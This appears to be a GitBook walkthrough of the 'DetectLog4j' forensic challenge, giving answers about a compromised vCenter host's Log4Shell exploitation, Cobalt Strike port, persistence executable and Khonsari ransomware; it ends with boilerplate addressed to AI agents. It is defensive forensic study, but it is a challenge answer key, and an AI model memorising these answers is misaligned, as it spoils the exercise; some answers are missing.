# DetectLog4j {% embed url="" %} ## Q1 What is the computer hostname? for this challenge, I will use autopsy and fkt imager, go-to operating system information and u will see the hostname in the right panel *(note that your result may have some difference from mine as the file is still loading )*

**Answer: vcw65** ## **Q2** What is the Timezone of the compromised machine? we need to open the SYSTEM file to know the timezone it will be at the following path: windows/system32/config the system file would be on the right panel we would search by Ftk imager this time till the autopsy completes its loading

export the file then load hive by registry editor. go to the path: system\ControlSet001\Control\TimeZoneInformation to find the timezone

the time zone is pacific standard time, google it

**Answer: UTC-8** ## **Q3** What is the current build number on the system? from the same path at Q2 for the system at ftk imager, scroll down for the SOFTWARE file and export it

load the hive using the registry editor and go to the path: software\Microsoft\Windows NT\CurrentVersion

**Answer: 14393** ## Q4 What is the computer IP? in the registry editor go to the path: system\ControlSet001\Services\Tcpip\Parameters\Interfaces{82e90056-fd8d-4a24-913a-fc46f535fddf}

**Answer: 192.168.112.139** ## **Q5** What is the domain computer was assigned to? in the registry editor go to the path: system\ControlSet001\Services\Tcpip\Parameters

**Answer: cyberdefenders.org** ## Q6 When was myoussef user created? now would use autopsy in the "Account" panel for the mentioned user time creation ![](https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FQeyiPE80U0kdYUaLP4fS%2Fimage.png?alt=media\&token=2d3e452a-49f0-4477-9194-50d21c1bf6d8) **Answer: 2021-12-28 06:57:23 utc** ## Q7 What is the user mhasan password hint? from the same panel at Q6 "Account",

Answer: ## Q8 What is the version of the VMware product installed on the machine? in the registry editor go to the path: software\VMware, Inc.\apacheTomcat

**Another way**** using autopsy:** from the installed programs :

**Answer: 6.7.0.40322** ## **Q9** What is the version of the log4j library used by the installed VMware product? actually, I didn't know how to find the library path so I tried to search for it by name using Autopsy and fortunately, I found it

**Answer: 2.11.2** ## **Q10** What is the log4j library log level specified in the configuration file? Search for log4j.properties and read the files till find their stat ..

**Answer: INFO** ## Q11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload? By searching in Google, the header is *x-forwarded-for*

https://thestack.technology/vmware-log4j-exposure-attack-log4shell/

**Answer: x-forwarded-for** ## **Q12** The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload? in autopsy search for log4shell.huntress.com, and export the log file.

**Answer: log4shell.huntress.com:1389/b1292f3c-a652-4240-8fb4-59c43141f55a** ## **Q13** When was the first successful login to vsphere WebClient? Search for audit\_events at autopsy or go to the path: ProgramData\VMware\vCenterServer\runtime\VMwareSTSService\logs then find the earlier Loginsuccess event.

**Answer: 28/12/2021 20:39:29 UTC** ## **Q14** What is the attacker's IP address? from the same events, we could find the IP 192.168.112.128 tried many times to log in.

**Answer: 192.168.112.128** ## **Q15** What is the port the attacker used to receive the cobalt strike reverse shell? search for PowerShell lunching logs, name : **Microsoft-Windows-PowerShell%4Operational.evtx** then search for BASE64

useing cyberchef transform from base 64 and gunzip

use execute the code using Fakenet then analyze it by Wireshark. **Answer: 1337** ## Q16 What is the script name published by VMware to mitigate log4shell vulnerability? Google it,

**Answer:vc\_log4j\_mitigator.py** ## Q17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to 'true' to work around the log4shell vulnerability? Again google it, then try both solutions : `log4j2.formatMsgNoLookups` or the `LOG4J_FORMAT_MSG_NO_LOOKUPS`

**Answer: log4j2.formatMsgNoLookups** ## Q18 What is the log4j version which contains a patch to CVE-2021-44228? search for CVE-2021-44228 path

**Answer: 2.15.0** ## Q19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the *JNDILookup.class*? Search for *JNDILookup.class and export the file,*

then extract the file and search for *JNDILookup.class*

using HachMyFiles,

**Answer: 0f038a1e0aa0aff76d66d1440c88a2b35a3d023ad8b2e3bac8e25a3208499f7e** ## **Q20** Analyze JNDILookup.class. What is the value stored in the CONTAINER\_JNDI\_RESOURCE\_PATH\_PREFIX variable? in Autopsy search for "CONTAINER\_JNDI\_RESOURCE\_PATH\_PREFIX" ![](https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FoaYfUuUi7WCljNO1caG4%2Fimage.png?alt=media\&token=bf5cc34f-0d81-44d0-853e-db71e1085662) **Answer: java: comp/env/** ## Q21 What is the executable used by the attacker to gain persistence? to find that we need to search for any startup program or executable file, so search in the user's file for NTUSER.DAT we will find it at the path: root\Users\Administrator.WIN-B633EO9K91M\NTUSER.DAT

export the file and open the hive using the registry editor finally, search for any file with " Run ", we would find "RunOnce"

**Answer: baaaackdooor.exe** ## **Q22** When was the first submission of ransomware to virustotal? after many searches, I found that the first ransomware submitted is "khonsari.exe" then I searched for its analysis report.

**Answer: 2021-12-11 22:57:01** ## **Q24** What is the ISP that owns that IP that serves the text file? from the previous virustotal report, the domain is Amazon ![](https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FJ9lk1bhNg1q1GEicoQ1A%2Fimage.png?alt=media\&token=34b1941b-c70a-48cd-8bd2-cfc0d68039ad) **Answer: Amazon** ## **Q25** The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for? from the article Khonsari ransomware analysis, we could see its behavior

**Answer: ini** Hope that helps you, and thank you :) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ahmedrehan.gitbook.io/ahmedrehan/ctf-walkthrough/detectlog4j.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.